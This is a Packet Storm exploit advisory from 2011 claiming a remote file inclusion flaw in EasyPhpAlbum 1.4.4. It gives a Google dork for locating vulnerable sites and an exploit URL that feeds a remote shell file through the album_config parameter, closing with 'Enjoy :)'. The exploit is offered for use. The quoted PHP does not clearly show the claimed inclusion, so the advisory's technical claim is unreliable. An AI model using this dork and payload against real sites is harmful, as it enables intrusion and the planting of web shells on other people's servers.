EasyPhpAlbum version 1.4.4 suffers from a remote file inclusion vulnerability.
2bae0999d88f5244b8451e4077620bf50cbb209654f694efb49c8232a4aaaeee# Exploit Title: EasyPhpAlbum v 1.4.4 Remote file include vulnerbility
# Google Dork: powered by EasyPhpAlbum
# Date: 26/1/2011
# Author: DIES3L
# Software Link: http://www.mywebmymail.com
# Version: v 1.4.4
# Tested on: ubuntu + win7
# Email : zxn@Hotmail.com
#######################################################
Fichier : index.php
http://localhost/[path]/index.php
Code :
<?php
include('../configuration.php');
$album_config=false;
?>
Exploit :
http://127.0.0.1/[path]/index.php?album_config= [ Shell.txt ]
Enjoy :)
##########################################################
#
Greetz To : #
RoMaNcYxHaCkEr - saudi0hacker - aB0-3tH4b T3rR0r - TakEr #
#
##########################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed